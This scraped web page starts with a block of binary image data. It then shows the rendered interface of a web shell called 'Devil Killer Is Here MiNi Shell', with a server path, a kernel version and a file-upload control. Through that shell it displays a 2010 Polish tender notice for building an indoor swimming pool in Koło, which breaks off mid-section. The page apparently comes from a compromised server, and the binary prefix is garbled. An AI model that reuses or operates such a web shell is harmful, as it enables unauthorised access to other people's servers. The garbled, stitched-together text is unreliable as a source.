JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100702/193740-N-2010.html

<p class="kh_header"><b>Koło: BUDOWA KRYTEJ PŁYWALNI W KOLE</b><br>
<b>Numer ogłoszenia: 193740 - 2010; data zamieszczenia: 02.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Koło , ul. Mickiewicza 12, 62-600 Koło, woj. wielkopolskie, tel. 063 2610252, 2610230, faks 063 2722984.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kolo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA KRYTEJ PŁYWALNI W KOLE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest budowa krytej pływalni w Kole wraz z infrastrukturą techniczną.
2.	Inwestycja zlokalizowana w Kole przy ulicy Kolejowej na działkach nr:

- 9/3, 9/4, 6,7,17 ark. mapy 14,
- 34/2, 36, 40 ark. mapy 15,
- 40 ark. mapy 23.

3.	Ogólna charakterystyka obiektu

Budynek krytej pływalni  pod względem funkcjonalnym  można podzielić na kilka stref:
1)	Parter ( +/- 0,00 m):

a)	strefa wejściowa i administracyjna - hol główny z szatnią ogólną, kasy, 
łazienki ogólnodostępne, (damska, męska i dla osób poruszających się na wózkach inwalidzkich), komunikacja, łącznik z istniejącym budynkiem szkoły, pomieszczenia biurowe, pomieszczenie ochrony, pomieszczenie zabaw dla dzieci, sklepik
b)	strefa pływalni - szatnie, łazienki z natryskami, pomieszczenie ratowników, pomieszczenie I pomocy, magazyn sprzętu basenowego, niecka sportowa, niecka rekreacyjna z hamownią, brodzik dla dzieci, strefa jacuzzi, zjeżdżalnia zewnętrzna z systemową klatką schodową, plaża basenowa, trybuny liczące 95 miejsc siedzących oraz miejsce dla osoby poruszającej się na wózku inwalidzkim, zaplecze socjalne personelu
c)	strefa SPA - komunikacja, recepcja, zespoły szatniowo - sanitarne, solarium, zespół saun, pomieszczenie rehabilitacyjne, sala ćwiczeń, pomieszczenie masażu
d)	strefa kręgielni - kręgielnia, toalety, szatnia okryć wierzchnich, bar, zaplecze baru.

2)	Piwnica ( - 3,60m, - 4,00m):

a)	strefa techniczna pływalni - węzeł cieplny, pom. filtrów, pomp, stacja uzdatniania wody, zbiorniki wyrównawcze, pom. na chemię basenową z wejściem z zewnątrz, wentylatornia, pom. rozdzielni elektrycznej, pom. gospodarcze, śmietnik na odpadki stałe nieorganiczne, serwerownia, pom. socjalne dla obsługi wraz z częścią sanitarną, śmietnik, podbasenie - obejście wokół niecek basenowych, wentylatornia strefy pływalni, wentylatornia holu,
b)	strefa techniczna SPA - wentylatornia SPA,
c)	strefa techniczna kręgielni - wentylatornia kręgielni.

3)	Obiekt pływalni połączony będzie łącznikiem z obiektem szkoły.

Dane metryczne obiektu:

zero budynku:		?0.00 = ppp=101,60 m n.p.m.
powierzchnia działki:	27.436,00 m2
powierzchnia zabudowy:	2.538,72 m2
powierzchnia całkowita:	4.427,67 m2
powierzchnia użytkowa:	3.552,22 m2
kubatura:	16.179,45 m3

4.	Dane ogólne przedmiotu zamówienia: (opis przedmiotu zamówienia rozpatrywać w nawiązaniu do przedmiaru robót) 

1)	Roboty budowlane architektoniczno - konstrukcyjne.

Wykonanie całości robót budowlanych architektoniczno - konstrukcyjnych, tj.: 

a)	Stanu surowego, w skład którego wchodzą: roboty ziemne, fundamenty, izolacje fundamentów,
b)	Stanu konstrukcyjnego w skład którego wchodzą: żelbetowe elementy konstrukcyjne, konstrukcje stropów, konstrukcje schodów, przygotowanie 
i montażu zbrojenia, roboty murowe, ścianki działowe, konstrukcje dachów,
c)	Stanu wykończeniowego, w skład którego wchodzą: izolacje i pokrycia dachów, elewacje, montaż ślusarek: aluminiowej, drzwiowej i okiennej, ślusarka wewnętrzna i zewnętrzna, różne elementy wewnętrzne i zewnętrzne, 
tynki i okładziny wewnętrzne, sufity podwieszane, malowanie, posadzki, ogrodzenia, roboty rozbiórkowe,
d)	Dostawa i montaż wyposażenia w skład którego wchodzą:

-	Szafy ubraniowe basenowe,
-	Niecka basenu rekreacyjnego z wyposażeniem i atrakcjami, ze stali nierdzewnej,
-	Niecka basenu pływackiego, z wyposażeniem sportowym, ze stali nierdzewnej,
-	Niecka brodzika dla dzieci z wyposażeniem i atrakcjami, ze stali nierdzewnej,
-	Niecka wanny z hydromasażem (Whirlpool),
-	Platforma dźwigowa, udźwig 300kg, 3 osoby lub osoba na wózku inwalidzkim + osoba towarzysząca, wymiar kabiny: 950x1300x2000mm.

2)	Roboty instalacji wodno - kanalizacyjnych, deszczowych, centralnego ogrzewania i wentylacji.

a)	Wykonanie całości robót związanych z przyłączami wodociągowym 
i kanalizacji sanitarnej tj.:

-	Przyłącza wodociągowego, w skład którego wchodzą: roboty ziemne, 
roboty montażowe - rurociągi i próby, roboty montażowe - studnia wodomierzowa, roboty montażowe - węzeł 2, roboty montażowe - węzeł 3, roboty montażowe - węzeł 11,
-	Przyłącza kanalizacji sanitarnej, w skład którego wchodzą: roboty ziemne, roboty odwodnieniowe, roboty montażowe.

b)	Wykonanie całości robót związanych z przyłączem cieplnym wysokoparametrowym tj.:

-	Przyłącze cieplne preizolowane, w skład którego wchodzą: roboty ziemne, roboty montażowe - rury, system nadzorujący, roboty instalacyjne w komorze, odtworzenie pasa drogowego.

c)	Wykonanie całości robót związanych z technologią węzła cieplnego, tj.:

-	Technologia węzła cieplnego, w skład którego wchodzą: rurociągi i armatura, urządzenia, izolacja termiczna i antykorozyjna, instalacja wentylacji.

d)	Wykonanie całości robót związanych z siecią kanalizacji sanitarnej, tj.:

-	Sieć kanalizacji sanitarnej, w skład którego wchodzą: roboty ziemne, roboty montażowe.

e)	Wykonanie całości robót związanych z instalacjami wodno - kanalizacyjnymi, tj.:

-	Instalacji wodociągowych i p. poż., w skład którego wchodzą: roboty montażowe 
- instalacja wodociągowa, roboty budowlane, roboty montażowe - przyłączenie wody do węzła cieplnego, roboty montażowe - instalacja wodociągowa do celów technologicznych, roboty montażowe - instalacja p. poż.,
-	Kanalizacji sanitarnej, w skład którego wchodzą: roboty montażowe, roboty budowlane,
-	Kanalizacji deszczowej wewnątrz budynku.

f)	Wykonanie całości robót związanych z instalacjami centralnego ogrzewania i ciepła technologicznego, tj.:

-	Instalacji centralnego ogrzewania, w skład którego wchodzą: roboty montażowe 
- rury, malowanie, roboty montażowe - izolacja rurociągów, roboty montażowe 
- grzejniki, roboty montażowe - armatura,
-	Instalacja ciepła technologicznego na potrzeby nagrzewnic wentylacyjnych, w skład którego wchodzą: roboty montażowe - rury, malowanie, roboty montażowe - izolacja rurociągów, roboty montażowe - armatura, 
-	Instalacja ciepła technologicznego na potrzeby technologii basenowej, 
w skład którego wchodzą: roboty montażowe - rury, malowanie, roboty montażowe - izolacja rurociągów, roboty montażowe - armatura.

g)	Wykonanie całości robót związanych z wentylacją mechaniczną tj.:

-	Instalacji wentylacji, w skład którego wchodzą: urządzenia i próby, przewody i izolacje,
-	Instalacja klimatyzacji, w skład którego wchodzą: klimatyzator, rurociągi.

3)	Roboty instalacji elektrycznych zewnętrznych, wewnętrznych, słaboprądowych.

a)	Wykonanie robót związanych z instalacjami elektrycznymi zewnętrznymi, tj.: 
Zasilanie podstawowe i rezerwowe w skład którego wchodzą: roboty ziemne, roboty montażowe.

b)	Wykonanie całości robót związanych z instalacjami elektrycznymi wewnętrznymi, tj.: 

Instalacje elektryczne wewnętrzne, w skład którego wchodzą: rozdzielnie elektryczne, WLZty zasilające rozdzielnice elektryczne, instalacja przeciwoblodzeniowa, instalacje oświetleniowe, siłowe, gniazd wtykowych, instalacji przyzywowej i połączeń wyrównawczych, instalacja odgromowa, uziom fundamentowy.

c)	Wykonanie całości robót związanych z instalacjami słaboprądowymi tj.: 

-	instalacja logiczna - okablowanie strukturalne i tablica informacyjna, 
w skład którego wchodzą: główny punkt dystrybucyjny GPD, punkty przyłączeniowe, przewody, koryta i rury ochronne, 
-	Elektroniczny system obsługi klienta ESOK, w skład którego wchodzą: okablowanie systemu ESOK, urządzenia i uruchomienie elektronicznego systemu obsługi klienta ESOK,
-	System CCTV, w skład którego wchodzą: punkt dystrybucyjny CCTV, punkty przyłączeniowe, przewody, koryta i rury ochronne, uruchomienie i praca próbna systemu,
-	Instalacja systemu nagłośnienia, w skład której wchodzą: urządzenia systemu nagłośnienia, przewody koryta i rury ochronne.

d)	Wykonanie całości robót związanych z instalacjami teletechnicznymi, tj.: 

Instalacja przyłącza telefonicznego do budynku.

4)	Technologia wody.

Wykonanie całości robót związanych z technologią wody, tj.: 

a)	Basen pływacki, w skład którego wchodzą: urządzenia i wyposażenie instalacji uzdatniania wody basenu pływackiego, roboty elektryczne wykonywane w ramach technologii wody basenowej basenu, wyposażenie niecki basenu pływackiego, armatura, kształtki i rurociągi ciśnieniowe PVC PN 10 basenu głównego, łączone poprzez klejenie, próby szczelności i rozruch basenu głównego.
b)	Basen rekreacyjny, w skład którego wchodzą: urządzenia i wyposażenie instalacji uzdatniania wody basenu rekreacyjnego, roboty elektryczne wykonywane 
w ramach technologii wody basenowej basenu, armatura, kształtki i rurociągi ciśnieniowe PVC PN 10 basenu rekreacyjnego, łączone poprzez klejenie, 
próby szczelności i rozruch basenu głównego.
c)	Brodzik dla dzieci, w skład którego wchodzą: urządzenia i wyposażenie instalacji uzdatniania wody brodzika, roboty elektryczne wykonywane w ramach technologii wody basenowej brodzika, armatura, kształtki i rurociągi ciśnieniowe PVC PN 10 brodzika, łączone poprzez klejenie, próby szczelności i rozruch brodzika.
d)	Wanna SPA, w skład którego wchodzą: urządzenia i wyposażenie instalacji uzdatniania wody wanny SPA, roboty elektryczne wykonywane w ramach technologii wody basenowej wanny SPA, armatura, kształtki i rurociągi ciśnieniowe PVC PN 10 wanny SPA, łączone poprzez klejenie, próby szczelności 
i rozruch wanny SPA.

5.	Roboty, których  nie obejmuje przedmiot zamówienia (wyłączone z zakresu)

1)	Roboty budowlane architektoniczno - konstrukcyjne.

a)	Dostawa i montaż wyposażenia w skład którego wchodzą: 

-	Wyposażenie sanitarne i szatniowe pływalni oraz pomieszczenia gospodarczego,
-	Krzesełka na trybunach przy basenie,
-	Meble z wyjątkiem szaf ubraniowych basenowych,
-	Wyposażenie boksu kasowego i blatu w szatni i recepcji,
-	Wyposażenie bufetu i zaplecza,
-	Wyposażenie pomieszczenia pierwszej pomocy,
-	Wyposażenie pomieszczenia rehabilitacji,
-	Wyposażenie sali ćwiczeń,
-	Wyposażenie pomieszczenia solarium,
-	Wyposażenie pomieszczenia masażu,
-	Wyposażenie pomieszczenia zabaw dla dzieci,
-	Wyposażenie zespołu saun,
-	Wyposażenie pływalni w skład którego wchodzą: tablica świetlna, akcesoria niezbędne do obsługi urządzenia do pomiaru czasu, zestaw do badania wody 
- fotometr elektroniczny, sprzęt do nauki pływania, sprzęt ratowniczy, podnośnik basenowy dla osób niepełnosprawnych, mała zjeżdżalnia dla dzieci, inwalidzki wózek prysznicowo - toaletowy, odkurzacz do czyszczenia basenów, 
sprzęt do czyszczenia powierzchni płaskich na basenach i szatniach, ławki basenowe, 
-	tory kręgielni - kręgielnia sznurowa wyposażona w 4 tory wraz z systemem sterującym i wyposażeniem.

2)	Roboty instalacji deszczowych.

Wykonanie całości robót związanych z przyłączem kanalizacji deszczowej, tj.: 

a)	Przyłącza kanalizacji deszczowej, w skład którego wchodzą: roboty ziemne, roboty montażowe,
b)	Podłączenia wpustów deszczowych, w skład którego wchodzą: roboty ziemne, roboty montażowe,
c)	Podłączenia rur deszczowych, w skład którego wchodzą: roboty ziemne, roboty montażowe.

3)	Roboty instalacji elektrycznych zewnętrznych.

Wykonanie robót związanych z instalacjami elektoenergetycznymi zewnętrznymi tj.:

a)	Kablowe oświetlenie zewnętrzne, w skład którego wchodzą: roboty ziemne, roboty montażowe,
b)	Zasilanie podstawowe i rezerwowe w skład którego wchodzą: dostarczenie i montaż agregatu prądotwórczego.

4)	Roboty drogowe

Wykonanie całości robót związanych z nowymi drogami, parkingami 
i chodnikami, tj.: 

a)	Roboty drogowe - rozbiórki,
b)	Roboty ziemne,
c)	Roboty drogowe.

5)	Roboty ogrodnicze budowy terenów zieleni i pielęgnacji w okresie gwarancyjnym.

Wykonanie całości robót związanych z budową terenów zieleni i pielęgnacji 
w okresie gwarancyjnym tj.: 

a)	Kształtowanie terenów zielonych w skład których wchodzą: roboty agrotechniczne, zadrzewienie, wykonanie trawników siewem,
b)	Roboty pielęgnacyjne w okresie gwarancyjnym,
c)	Zakup materiału roślinnego.

6.	Przedmiot zamówienia sklasyfikowany został wg Wspólnego Słownika Zamówień (CPV) następująco:

1)	CPV: 45.20.00.00-9	-  Roboty budowlane w zakresie wznoszenia kompletnych  obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej,
2)	CPV: 45.21.22.12-5	-  Roboty budowlane w zakresie basenów pływackich,
3)	CPV: 45.23.13.00-8	-  Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków.

7.	Zaleca się, aby Wykonawca zdobył wszelkie informacje (np. dokonał wizji lokalnej na terenie budowy), które mogą być konieczne do przygotowania oferty oraz podpisania umowy.
8.	Wszystkie materiały użyte do wykonania zamówienia muszą posiadać aktualny atest higieniczny i certyfikat dopuszczający do stosowania w budownictwie.
9.	Przy wykonywaniu robót budowlanych niezbędne jest zachowanie wszystkich wymogów jakościowych, technicznych i bezpieczeństwa określonych w powszechnie obowiązujących przepisach prawa.
10.	Wymagane jest udzielenie przez Wykonawcę co najmniej 36 miesięcznej rękojmi na wykonane roboty, licząc od dnia protokólarnego odbioru całości robót objętych przedmiotem zamówienia.
11.	Wykonawca udzieli ponadto co najmniej 84 miesięcy gwarancji na wykonane roboty budowlane  oraz gwarancji producentów na zastosowane materiały i urządzenia, licząc od dnia protokólarnego odbioru całości robót objętych przedmiotem zamówienia.
12.	Wykonawca jest zobowiązany do zapewnienia bezpłatnej obsługi serwisowej stacji uzdatniania wody przez okres co najmniej 12 miesięcy od daty uzyskania decyzji na użytkowanie obiektu.
13.	Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowa?nie innych materiałów i urządzeń niż podane w dokumentacji projektowej, pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. 
W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, 
które uwiarygodnią proponowane przez Wykonawcę materiały i urządzenia. 
W przy?padku, gdy zastosowanie tych materiałów lub urządzeń wyma?gać będzie zmiany dokumentacji projektowej, koszty tych zmian poniesie Wykonawca. 
Złożone przez Wykonawcę ww. dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty z po?wodu nierównoważności zaproponowanych zamienników lub przyjęciu oferty.
14.	Szczegółowa charakterystyka, zakres oraz ilość robót budowlanych do wykonania został opisany w przedmiarach robót, dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót załączonych do SIWZ.
15.	Szczegółowe warunki realizacji zamówienia określone zostały w druku PROJEKT UMOWY..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.21.22.12-5, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 150000,00zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są udokumentować posiadanie wiedzy i doświadczenia uzyskanego samodzielnie, w ramach konsorcjum lub spółki cywilnej, 
albo na podstawie pisemnego zobowiązania innego podmiotu,  o którym mowa 
jest w  Załączniku Nr 5 do SIWZ, które obejmuje budowę co najmniej jednego obiektu typu kryta pływalnia o wymiarach niecki basenowej min. 12 x 25 m 
i wartości minimum 8.000.000 zł brutto zrealizowanego w okresie ostatnich 
5 lat przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są udokumentować dysponowanie na podstawie umowy 
o pracę, umowy cywilnoprawnej lub pisemnego zobowiązania innego podmiot, 
o którym mowa jest w Załączniku Nr 5 do SIWZ osobami, które posiadają uprawnienia budowlane w specjalnościach niezbędnych do kierowania robotami budowlanymi objętymi przedmiotem zamówienia publicznego, tj.:

a)	kierownik budowy - uprawnienia budowlane w specjalności konstrukcyjno
-budowlanej bez ograniczeń,
b)	kierownik robót - uprawnienia budowlane w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
c)	kierownik robót - uprawnienia budowlane w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych  bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są udokumentować, że 

a)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej do kwoty minimum 3.000.000 zł,
b)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a zwłaszcza wykażą, że bank lub spółdzielcza kasa oszczędnościowo-kredytową, w których posiadają rachunek potwierdzi wysokość posiadanych środków finansowych lub ich zdolność kredytową na łączną kwotę co najmniej 5.000.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

